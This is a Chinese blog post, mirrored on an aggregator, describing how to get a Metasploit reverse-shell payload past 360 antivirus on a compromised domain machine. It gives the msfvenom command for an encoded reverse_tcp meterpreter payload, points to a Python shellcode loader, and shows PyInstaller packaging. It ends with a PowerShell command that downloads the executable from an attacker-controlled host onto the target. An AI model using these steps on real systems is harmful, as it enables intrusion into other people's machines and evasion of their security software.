zoukankan      html  css  js  c++  java
  • msf免杀

    卧槽 最近闲的没事干 搞一下渗透学习下

    拿到 一个域成员权限,但是有360  。。。。(&……%

    好烦啊

    都不能免杀

    突然看到一个帖子 很牛逼 依然到现在还是免杀的

    首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 -f py > 1.py

    可以修改成好点的端口443啊 80都行

    然后cat下1.py  把里面的shellocde拷贝到下面这个py 里替换掉

    代码如下 https://github.com/xsser/privatemsf/

    自己换成msf生成的shellcode

    然后开始。。安装pip install pyinstaller  这个地方可以用下国内的源 -i http://pypi.douban.com/simple --trusted-host pypi.douban.com

    https可能还遇到各种问题 所以我找http的源就行了

    然后下载蹭蹭蹭的速度

    搞定了之后

    PyInstaller --console --onefile  shellcode.py
    

    然后。。。就生成了一个二进制文件

    想办法拖到对面的机器上。吗的 我遇到了360  只能用unc那种\share目录的方法去我的vps上下载 或者是

    powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.174.145/shellcode.exe','C:	estupdateshellcode.exe')
    

     总之这个不是重点

  • 相关阅读:
    [hdu4436 str2int]后缀自动机SAM(或后缀数组SA)
    bytedance专题
    LSTM+CRF维特比解码过程
    spark core类梳理
    spark源码阅读---Utils.getCallSite
    python2.7官方文档阅读笔记
    cs224d---词向量表示
    cs231n---强化学习
    cs231n---生成模型
    Spring 2017 Assignments3
  • 原文地址:https://www.cnblogs.com/xsserhaha/p/10703627.html
Copyright © 2011-2022 走看看